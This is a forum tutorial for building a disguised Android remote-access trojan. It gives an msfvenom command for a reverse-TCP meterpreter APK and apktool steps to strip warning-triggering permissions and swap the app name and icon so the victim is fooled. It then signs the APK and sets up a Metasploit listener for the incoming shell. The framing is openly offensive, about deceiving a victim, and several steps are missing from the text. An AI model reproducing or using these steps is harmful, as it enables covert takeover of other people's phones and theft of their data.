Well hello dear readers of Null byte,
let me start off stating english is not my first language and they will be some grammar mistakes. This also is my first tutorial so don’t hesitate to give me feedback 🙂
You may have made a malicious apk (android package) before on kali, it is done the same way you make a malicious exe. Done by msfvenom.
In this short tutorial I will show you how to change the icon, permissions, and name of the app, to make it more convincing for your victim. Something which can be very relevant when you are Social Engineering someone.
So, lets start off by making our meterpreter apk. Enter this code in the terminal
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk
This will create app.apk in your current folder.
Now comes the hard part.
You will need to install Apktool on your system, I used windows for this, but it should be done the same way on linux/mac os. Since this is different for everybody I won’t cover installing this tool. Check out their website for your system.
Do note that Apktool is installed by default in the reverse engineering toolkit from Kali linux!
First check if you can run apktool properly by running the command:
If you get the help menu, everything is installed correctly. Now run the command
apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder
apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files. Most likly:
- The ‘res’ folder
- The AndroidManifest.xml file
- The ‘smali’ folder
- The ‘orginal’ folder
- The apktool.yml file
For this tutorial we are only going to modify the AndroidManifest.xml file and the ‘res’ folder. First off, open the AndroidManifest.xml with your preffered text editor. I am using Notepad++.
You will see something like this:
First off, lets delete a few lines we will probably not need and will give the user an extra warning.
Since nullbyte messes with symbols here is a pastebin with what to do
You’re back? Great.
Now we are going into the ‘res’ folder. Here you will find ‘values’ folder, go into it. Now you will find 2 files, 1 named strings.xml, once again, open this xml file with your preffered text editor.
You will find the line
The goal is to get 3 png files of the following sizes:
- 36×36 (pixels) for the ldpi folder
- 48×48 for the mdpi folder
- 72×72 for the hdpi folder
Name these png files all ‘icon.png’ and place them in the appropriate folder.
This process is very straight forward. Go back to the apktool terminal and enter the following command:
apktool b /pathtoyourfolder/folder
This will create an apk in the newly created ‘dist’ folder (found in apktool b /pathtoyourfolder/folder)
You thought we were done? Almost, just one more step.
java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk
This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon.
Now the final part,
open up metasploit using:
set the payload
set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)
Now once the open up the app, you will get an incoming meterpreter shell, sweet right?
I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.